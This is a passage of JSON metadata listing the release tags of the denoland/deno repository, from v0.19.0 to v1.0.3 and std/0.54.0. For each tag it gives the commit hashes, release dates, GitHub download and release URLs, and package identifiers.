0c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","depend